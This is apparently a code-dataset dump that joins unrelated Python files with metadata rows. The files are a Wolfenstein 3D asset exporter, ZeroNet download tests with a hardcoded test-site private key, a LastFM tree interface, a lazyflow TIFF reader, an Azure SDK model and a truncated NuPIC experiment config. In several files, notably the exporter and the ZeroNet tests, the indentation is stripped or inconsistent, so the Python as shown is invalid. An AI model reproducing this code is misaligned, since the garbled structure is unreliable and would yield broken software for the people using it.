        wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
                                        wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
        ogg_path = None  # ensure the finally clause never sees an unbound name
        try:
            ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
            zip_file.write(ogg_path, path)
        finally:
            _force_unlink(wave_path, ogg_path)
logger.info('Done')
_sep()
def export_adlib_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting AdLib sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['adlib']
adlib_manager = pywolf.audio.AdLibSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(adlib_manager):
name = cfg.ADLIB_SOUND_NAMES[i]
path = 'sound/{}/adlib/{}.ogg'.format(params.short_name, name)
logger.info('AdLib sound [%d/%d]: %r', (i + 1), count, path)
imf_chunk = sound.to_imf_chunk()
        wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
                                        wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
        ogg_path = None  # ensure the finally clause never sees an unbound name
        try:
            ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
            zip_file.write(ogg_path, path)
        finally:
            _force_unlink(wave_path, ogg_path)
logger.info('Done')
_sep()
def export_buzzer_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting buzzer sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['buzzer']
buzzer_manager = pywolf.audio.BuzzerSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(buzzer_manager):
name = cfg.BUZZER_SOUND_NAMES[i]
path = 'sound/{}/buzzer/{}.wav'.format(params.short_name, name)
logger.info('Buzzer sound [%d/%d]: %r', (i + 1), count, path)
wave_file = io.BytesIO()
sound.wave_write(wave_file, params.wave_rate)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_tilemaps(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tilemaps (Q3Map2 *.map)')
start, count = 0, sum(episode[1] for episode in cfg.EPISODES)
tilemap_manager = pywolf.game.TileMapManager(audio_chunks_handler, start, count)
i = 1
for episode_index, episode in enumerate(cfg.EPISODES):
for submap_index in range(episode[1]):
tilemap_index = episode[0] + submap_index
tilemap = tilemap_manager[tilemap_index]
name = '{}_e{}m{}'.format(params.short_name, episode_index + 1, submap_index + 1)
folder = os.path.join(params.output_folder, 'maps')
os.makedirs(folder, exist_ok=True)
path = os.path.join(folder, (name + '.map'))
logger.info('TileMap [%d/%d]: %r = %r', i, count, path, tilemap.name)
exporter = MapExporter(params, cfg, tilemap, episode_index, submap_index)
description = '\n'.join(exporter.describe_tilemap())
with open(path, 'wt') as map_file:
map_file.write(description)
path = 'maps/{}.map'.format(name)
zip_file.writestr(path, description)
i += 1
logger.info('Done')
_sep()
def main(*args):
logger = logging.getLogger()
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.DEBUG)
logger.addHandler(stdout_handler)
logger.setLevel(logging.DEBUG)
parser = build_argument_parser()
params = parser.parse_args(args)
logger.info('Command-line parameters:')
for key, value in sorted(params.__dict__.items()):
logger.info('%s = %r', key, value)
_sep()
cfg = load_as_module('cfg', params.cfg)
vswap_data_path = os.path.join(params.input_folder, params.vswap_data)
logger.info('Precaching VSwap chunks: <data>=%r', vswap_data_path)
vswap_chunks_handler = pywolf.persistence.VSwapChunksHandler()
with open(vswap_data_path, 'rb') as data_file:
vswap_chunks_handler.load(data_file)
vswap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(vswap_chunks_handler)
_sep()
audio_data_path = os.path.join(params.input_folder, params.audio_data)
audio_header_path = os.path.join(params.input_folder, params.audio_header)
logger.info('Precaching audio chunks: <data>=%r, <header>=%r', audio_data_path, audio_header_path)
audio_chunks_handler = pywolf.persistence.AudioChunksHandler()
    with open(audio_data_path, 'rb') as data_file, \
            open(audio_header_path, 'rb') as header_file:
audio_chunks_handler.load(data_file, header_file)
audio_chunks_handler = pywolf.persistence.PrecachedChunksHandler(audio_chunks_handler)
_sep()
graphics_data_path = os.path.join(params.input_folder, params.graphics_data)
graphics_header_path = os.path.join(params.input_folder, params.graphics_header)
graphics_huffman_path = os.path.join(params.input_folder, params.graphics_huffman)
logger.info('Precaching graphics chunks: <data>=%r, <header>=%r, <huffman>=%r',
graphics_data_path, graphics_header_path, graphics_huffman_path)
graphics_chunks_handler = pywolf.persistence.GraphicsChunksHandler()
    with open(graphics_data_path, 'rb') as data_file, \
            open(graphics_header_path, 'rb') as header_file, \
            open(graphics_huffman_path, 'rb') as huffman_file:
graphics_chunks_handler.load(data_file, header_file, huffman_file, cfg.GRAPHICS_PARTITIONS_MAP)
graphics_chunks_handler = pywolf.persistence.PrecachedChunksHandler(graphics_chunks_handler)
_sep()
maps_data_path = os.path.join(params.input_folder, params.maps_data)
maps_header_path = os.path.join(params.input_folder, params.maps_header)
logger.info('Precaching map chunks: <data>=%r, <header>=%r', maps_data_path, maps_header_path)
tilemap_chunks_handler = pywolf.persistence.MapChunksHandler()
    with open(maps_data_path, 'rb') as data_file, \
            open(maps_header_path, 'rb') as header_file:
tilemap_chunks_handler.load(data_file, header_file)
tilemap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(tilemap_chunks_handler)
_sep()
pk3_path = os.path.join(params.output_folder, params.output_pk3)
logger.info('Creating PK3 (ZIP/deflated) file: %r', pk3_path)
with zipfile.ZipFile(pk3_path, 'w', zipfile.ZIP_DEFLATED) as pk3_file:
_sep()
export_tilemaps(params, cfg, pk3_file, tilemap_chunks_handler)
export_shaders(params, cfg, pk3_file)
export_textures(params, cfg, pk3_file, vswap_chunks_handler)
export_sprites(params, cfg, pk3_file, vswap_chunks_handler)
export_pictures(params, cfg, pk3_file, graphics_chunks_handler)
export_tile8(params, cfg, pk3_file, graphics_chunks_handler)
export_screens(params, cfg, pk3_file, graphics_chunks_handler)
export_helparts(params, cfg, pk3_file, graphics_chunks_handler)
export_endarts(params, cfg, pk3_file, graphics_chunks_handler)
export_sampled_sounds(params, cfg, pk3_file, vswap_chunks_handler)
export_adlib_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_buzzer_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_musics(params, cfg, pk3_file, audio_chunks_handler)
logger.info('PK3 archived successfully')
if __name__ == '__main__':
main(*sys.argv[1:])
|
gpl-3.0
| 7,717,207,670,447,818,000
| 39.547742
| 116
| 0.571163
| false
| 3.404789
| false
| false
| false
|
frerepoulet/ZeroNet
|
src/Test/TestSiteDownload.py
|
1
|
15361
|
import time
import pytest
import mock
import gevent
from Connection import ConnectionServer
from Config import config
from File import FileRequest
from File import FileServer
from Site import Site
import Spy
@pytest.mark.usefixtures("resetTempSettings")
@pytest.mark.usefixtures("resetSettings")
class TestSiteDownload:
def testDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
with Spy.Spy(FileRequest, "route") as requests:
def boostRequest(inner_path):
                # I really want these files
if inner_path == "index.html":
site_temp.needFile("data/img/multiuser.png", priority=5, blocking=False)
site_temp.needFile("data/img/direct_domains.png", priority=5, blocking=False)
site_temp.onFileDone.append(boostRequest)
site_temp.download(blind_includes=True).join(timeout=5)
file_requests = [request[2]["inner_path"] for request in requests if request[0] in ("getFile", "streamFile")]
# Test priority
assert file_requests[0:2] == ["content.json", "index.html"] # Must-have files
assert file_requests[2:4] == ["css/all.css", "js/all.js"] # Important assets
assert file_requests[4] == "dbschema.json" # Database map
assert file_requests[5:7] == ["data/img/multiuser.png", "data/img/direct_domains.png"] # Directly requested files
assert "-default" in file_requests[-1] # Put default files for cloning to the end
# Check files
bad_files = site_temp.storage.verifyFiles(quick_check=True)
# -1 because data/users/1J6... user has invalid cert
assert len(site_temp.content_manager.contents) == len(site.content_manager.contents) - 1
assert not bad_files
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
def testArchivedDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Download normally
site_temp.addPeer("127.0.0.1", 1544)
site_temp.download(blind_includes=True).join(timeout=5)
bad_files = site_temp.storage.verifyFiles(quick_check=True)
assert not bad_files
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" in site_temp.content_manager.contents
assert site_temp.storage.isFile("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 2
# Add archived data
assert not "archived" in site.content_manager.contents["data/users/content.json"]["user_contents"]
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", time.time()-1)
site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"] = {"1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q": time.time()}
site.content_manager.sign("data/users/content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
date_archived = site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"]["1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q"]
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived-1)
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived)
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived+1) # Allow user to update archived data later
# Push archived update
assert not "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
site.publish()
site_temp.download(blind_includes=True).join(timeout=5) # Wait for download
        # The archived content should disappear from the remote client
assert "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" not in site_temp.content_manager.contents
assert not site_temp.storage.isDir("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 1
assert len(list(site_temp.storage.query("SELECT * FROM json WHERE directory LIKE '%1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q%'"))) == 0
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when connected peer has the optional file
def testOptionalDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
# Download site
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
site.storage.verifyFiles(quick_check=True) # Find what optional files we have
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.storage.isFile("data/optional.txt")
assert site.storage.isFile("data/optional.txt")
site_temp.needFile("data/optional.txt")
assert site_temp.storage.isFile("data/optional.txt")
# Optional user file
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
optional_file_info = site_temp.content_manager.getFileInfo(
"data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif"
)
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
    # Test when the connected peer does not have the file, so ask it whether it knows someone who has it
def testFindOptional(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init full source server (has optional files)
site_full = Site("1TeSTvb4w2PWE81S2rEELgmX2GCCExQGT")
file_server_full = FileServer("127.0.0.1", 1546)
site_full.connection_server = file_server_full
gevent.spawn(lambda: ConnectionServer.start(file_server_full))
time.sleep(0.001) # Port opening
file_server_full.sites[site_full.address] = site_full # Add site
site_full.storage.verifyFiles(quick_check=True) # Check optional files
site_full_peer = site.addPeer("127.0.0.1", 1546) # Add it to source server
hashfield = site_full_peer.updateHashfield() # Update hashfield
assert len(site_full.content_manager.hashfield) == 8
assert hashfield
assert site_full.storage.isFile("data/optional.txt")
assert site_full.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert len(site_full_peer.hashfield) == 8
# Remove hashes from source server
for hash in list(site.content_manager.hashfield):
site.content_manager.hashfield.remove(hash)
# Init client server
site_temp.connection_server = ConnectionServer("127.0.0.1", 1545)
site_temp.addPeer("127.0.0.1", 1544) # Add source server
# Download normal files
site_temp.log.info("Start Downloading site")
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
optional_file_info2 = site_temp.content_manager.getFileInfo("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site_temp.storage.isFile("data/optional.txt")
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
        assert not site.content_manager.hashfield.hasHash(optional_file_info["sha512"])  # Source server doesn't know it has the file
        assert not site.content_manager.hashfield.hasHash(optional_file_info2["sha512"])  # Source server doesn't know it has the file
assert site_full_peer.hashfield.hasHash(optional_file_info["sha512"]) # Source full peer on source server has the file
assert site_full_peer.hashfield.hasHash(optional_file_info2["sha512"]) # Source full peer on source server has the file
        assert site_full.content_manager.hashfield.hasHash(optional_file_info["sha512"])  # Source full server knows it has the file
        assert site_full.content_manager.hashfield.hasHash(optional_file_info2["sha512"])  # Source full server knows it has the file
site_temp.log.info("Request optional files")
with Spy.Spy(FileRequest, "route") as requests:
            # Request 2 files at the same time
threads = []
threads.append(site_temp.needFile("data/optional.txt", blocking=False))
threads.append(site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif", blocking=False))
gevent.joinall(threads)
assert len([request for request in requests if request[0] == "findHashIds"]) == 1 # findHashids should call only once
assert site_temp.storage.isFile("data/optional.txt")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.deleteFiles()
file_server_full.stop()
[connection.close() for connection in file_server.connections]
def testUpdate(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Don't try to find peers from the net
site.announce = mock.MagicMock(return_value=True)
site_temp.announce = mock.MagicMock(return_value=True)
# Connect peers
site_temp.addPeer("127.0.0.1", 1544)
# Download site from site to site_temp
site_temp.download(blind_includes=True).join(timeout=5)
# Update file
data_original = site.storage.open("data/data.json").read()
data_new = data_original.replace('"ZeroBlog"', '"UpdatedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json", "wb").write(data_new)
assert site.storage.open("data/data.json").read() == data_new
assert site_temp.storage.open("data/data.json").read() == data_original
site.log.info("Publish new data.json without patch")
# Publish without patch
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish()
time.sleep(0.1)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 1
assert site_temp.storage.open("data/data.json").read() == data_new
# Close connection to avoid update spam limit
site.peers.values()[0].remove()
site.addPeer("127.0.0.1", 1545)
site_temp.peers.values()[0].ping() # Connect back
time.sleep(0.1)
# Update with patch
data_new = data_original.replace('"ZeroBlog"', '"PatchedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json-new", "wb").write(data_new)
assert site.storage.open("data/data.json-new").read() == data_new
assert site_temp.storage.open("data/data.json").read() != data_new
# Generate diff
diffs = site.content_manager.getDiffs("content.json")
assert not site.storage.isFile("data/data.json-new") # New data file removed
assert site.storage.open("data/data.json").read() == data_new # -new postfix removed
assert "data/data.json" in diffs
assert diffs["data/data.json"] == [('=', 2), ('-', 29), ('+', ['\t"title": "PatchedZeroBlog",\n']), ('=', 31102)]
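        # Diff ops, as asserted above, appear to be: ('=', n) keeps n characters,
        # ('-', n) drops n characters, ('+', [lines]) inserts new lines; publishing
        # with such a patch transfers only the changed fragment, not the whole file.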
# Publish with patch
site.log.info("Publish new data.json with patch")
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish(diffs=diffs)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 0
assert site_temp.storage.open("data/data.json").read() == data_new
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
|
gpl-2.0
| -2,810,019,909,871,408,600
| 50.720539
| 173
| 0.679643
| false
| 3.386464
| true
| false
| false
|
UB-info/estructura-datos
|
RafaelArqueroGimeno_S6/ABBInterface.py
|
1
|
1812
|
import copy
from itertools import cycle, islice
from model import *
import view
import parserLastFM
__author__ = "Rafael Arquero Gimeno"
def add(users, parser):
"""
:type users: ABB
:param parser: File parser
:return: A Binary Search Tree containing old + parsed values
"""
for user in islice(parser, 5000):
users.insert(user)
return users
def search(source, minimum=0.0, maximum=1.0):
"""Returns an iterator that returns values inside the interval in the given tree
:rtype : generator
:param source: Original Tree
:param minimum: lower bound
:param maximum: higher bound
"""
assert minimum <= maximum
    # the tree is passed by reference; copy it so we can prune it safely
result = copy.copy(source)
result.deleteLower(minimum).deleteHigher(maximum)
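    # cycle() repeats the matching users endlessly; None signals an empty interval.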
return cycle(result) if result else None
def remove(source, minimum=0.0, maximum=1.0):
"""Returns a tree with with the values of given source if they are out of given interval
:type source: ABB
"""
assert minimum <= maximum
lowers, highers = copy.copy(source), copy.copy(source)
lowers.deleteHigher(minimum)
highers.deleteLower(maximum)
    root = highers.min  # the lowest value in highers becomes the new root
highers.delete(root, wholeNode=True)
result = ABB().insert(root)
result.root.left = lowers.root
result.root.right = highers.root
return result
def useful_info(tree):
"""Returns a string with useful info about the given ABB
:type tree: ABB
"""
return "Depth: " + str(tree.depth)
def emptyType():
return ABB()
if __name__ == "__main__":
parser = parserLastFM.parser("LastFM_small.dat")
app = view.MainApp(parser, add, search, remove, useful_info, emptyType())
app.mainloop()
|
mit
| -3,641,968,380,993,265,000
| 23.16
| 92
| 0.674393
| false
| 3.736082
| false
| false
| false
|
stuarteberg/lazyflow
|
lazyflow/operators/ioOperators/opTiffReader.py
|
1
|
7430
|
import numpy
# Note: tifffile can also be imported from skimage.external.tifffile.tifffile_local,
# but we can't use that module because it is based on a version of tifffile that has a bug.
# (It doesn't properly import the tifffile.c extension module.)
#import skimage.external.tifffile.tifffile_local as tifffile
import tifffile
import _tifffile
if tifffile.decodelzw != _tifffile.decodelzw:
import warnings
warnings.warn("tifffile C-extension is not working, probably due to a bug in tifffile._replace_by().\n"
"TIFF decompression will be VERY SLOW.")
import vigra
from lazyflow.graph import Operator, InputSlot, OutputSlot
from lazyflow.roi import roiToSlice
from lazyflow.request import RequestLock
import logging
logger = logging.getLogger(__name__)
class OpTiffReader(Operator):
"""
Reads TIFF files as an ND array. We use two different libraries:
- To read the image metadata (determine axis order), we use tifffile.py (by Christoph Gohlke)
- To actually read the data, we use vigra (which supports more compression types, e.g. JPEG)
Note: This operator intentionally ignores any colormap
information and uses only the raw stored pixel values.
(In fact, avoiding the colormapping is not trivial using the tifffile implementation.)
TODO: Add an option to output color-mapped pixels.
"""
Filepath = InputSlot()
Output = OutputSlot()
TIFF_EXTS = ['.tif', '.tiff']
def __init__(self, *args, **kwargs):
super( OpTiffReader, self ).__init__( *args, **kwargs )
self._filepath = None
self._page_shape = None
def setupOutputs(self):
self._filepath = self.Filepath.value
with tifffile.TiffFile(self._filepath) as tiff_file:
series = tiff_file.series[0]
if len(tiff_file.series) > 1:
raise RuntimeError("Don't know how to read TIFF files with more than one image series.\n"
"(Your image has {} series".format( len(tiff_file.series) ))
axes = series.axes
shape = series.shape
pages = series.pages
first_page = pages[0]
dtype_code = first_page.dtype
if first_page.is_palette:
# For now, we don't support colormaps.
# Drop the (last) channel axis
# (Yes, there can be more than one :-/)
last_C_pos = axes.rfind('C')
assert axes[last_C_pos] == 'C'
axes = axes[:last_C_pos] + axes[last_C_pos+1:]
shape = shape[:last_C_pos] + shape[last_C_pos+1:]
# first_page.dtype refers to the type AFTER colormapping.
# We want the original type.
key = (first_page.sample_format, first_page.bits_per_sample)
dtype_code = self._dtype = tifffile.TIFF_SAMPLE_DTYPES.get(key, None)
# From the tifffile.TiffPage code:
# -----
# The internal, normalized '_shape' attribute is 6 dimensional:
#
# 0. number planes (stk)
# 1. planar samples_per_pixel
# 2. image_depth Z (sgi)
# 3. image_length Y
# 4. image_width X
# 5. contig samples_per_pixel
(N, P, D, Y, X, S) = first_page._shape
assert N == 1, "Don't know how to handle any number of planes except 1 (per page)"
assert P == 1, "Don't know how to handle any number of planar samples per pixel except 1 (per page)"
assert D == 1, "Don't know how to handle any image depth except 1"
if S == 1:
self._page_shape = (Y,X)
self._page_axes = 'yx'
else:
assert shape[-3:] == (Y,X,S)
self._page_shape = (Y,X,S)
self._page_axes = 'yxc'
assert 'C' not in axes, \
"If channels are in separate pages, then each page can't have multiple channels itself.\n"\
"(Don't know how to weave multi-channel pages together.)"
self._non_page_shape = shape[:-len(self._page_shape)]
assert shape == self._non_page_shape + self._page_shape
assert self._non_page_shape or len(pages) == 1
axes = axes.lower().replace('s', 'c')
if 'i' in axes:
for k in 'tzc':
if k not in axes:
axes = axes.replace('i', k)
break
if 'i' in axes:
raise RuntimeError("Image has an 'I' axis, and I don't know what it represents. "
"(Separate T,Z,C axes already exist.)")
self.Output.meta.shape = shape
self.Output.meta.axistags = vigra.defaultAxistags( axes )
self.Output.meta.dtype = numpy.dtype(dtype_code).type
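        # Hint downstream operators to request whole pages: one unit along each
        # non-page axis, plus a full (y, x[, c]) plane along the page axes.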
self.Output.meta.ideal_blockshape = ((1,) * len(self._non_page_shape)) + self._page_shape
def execute(self, slot, subindex, roi, result):
"""
Use vigra (not tifffile) to read the result.
This allows us to support JPEG-compressed TIFFs.
"""
num_page_axes = len(self._page_shape)
roi = numpy.array( [roi.start, roi.stop] )
page_index_roi = roi[:, :-num_page_axes]
roi_within_page = roi[:, -num_page_axes:]
logger.debug("Roi: {}".format(map(tuple, roi)))
# Read each page out individually
page_index_roi_shape = page_index_roi[1] - page_index_roi[0]
for roi_page_ndindex in numpy.ndindex(*page_index_roi_shape):
if self._non_page_shape:
tiff_page_ndindex = roi_page_ndindex + page_index_roi[0]
tiff_page_list_index = numpy.ravel_multi_index(tiff_page_ndindex, self._non_page_shape)
logger.debug( "Reading page: {} = {}".format( tuple(tiff_page_ndindex), tiff_page_list_index ) )
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=int(tiff_page_list_index), order='C')
else:
# Only a single page
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=0, order='C')
page_data = page_data.withAxes(self._page_axes)
assert page_data.shape == self._page_shape, \
"Unexpected page shape: {} vs {}".format( page_data.shape, self._page_shape )
result[ roi_page_ndindex ] = page_data[roiToSlice(*roi_within_page)]
def propagateDirty(self, slot, subindex, roi):
if slot == self.Filepath:
self.Output.setDirty( slice(None) )
if __name__ == "__main__":
from lazyflow.graph import Graph
graph = Graph()
opReader = OpTiffReader(graph=graph)
opReader.Filepath.setValue('/groups/flyem/home/bergs/Downloads/Tiff_t4_HOM3_10frames_4slices_28sec.tif')
print opReader.Output.meta.axistags
print opReader.Output.meta.shape
print opReader.Output.meta.dtype
print opReader.Output[2:3,2:3,2:3,10:20,20:50].wait().shape
# opReader.Filepath.setValue('/magnetic/data/synapse_small.tiff')
# print opReader.Output.meta.axistags
# print opReader.Output.meta.shape
# print opReader.Output.meta.dtype
|
lgpl-3.0
| 642,158,149,604,213,600
| 42.964497
| 125
| 0.577793
| false
| 3.746848
| false
| false
| false
|
sharadagarwal/autorest
|
AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/StorageManagementClient/storagemanagementclient/models/check_name_availability_result.py
|
1
|
1683
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CheckNameAvailabilityResult(Model):
"""
The CheckNameAvailability operation response.
:param name_available: Gets a boolean value that indicates whether the
name is available for you to use. If true, the name is available. If
    false, the name has already been taken or is invalid and cannot be used.
:type name_available: bool
:param reason: Gets the reason that a storage account name could not be
used. The Reason element is only returned if NameAvailable is false.
Possible values include: 'AccountNameInvalid', 'AlreadyExists'
:type reason: str or :class:`Reason
<storagemanagementclient.models.Reason>`
:param message: Gets an error message explaining the Reason value in more
detail.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'Reason'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(self, name_available=None, reason=None, message=None):
self.name_available = name_available
self.reason = reason
self.message = message
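# A minimal usage sketch (values are illustrative, not from a real service call):
#
#   result = CheckNameAvailabilityResult(
#       name_available=False,
#       reason='AlreadyExists',
#       message='The storage account name is already taken.')
#   if not result.name_available:
#       print(result.reason, result.message)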
|
mit
| 6,416,804,943,986,815,000
| 39.071429
| 77
| 0.630422
| false
| 4.585831
| false
| false
| false
|
akhilaananthram/nupic.research
|
sequence_prediction/continuous_sequence/swarm_sine/description.py
|
1
|
12630
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ycui/nta/nupic/nupic/frameworks/opf/exp_generator/ExpGenerator.pyc'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer
)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalMultiStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
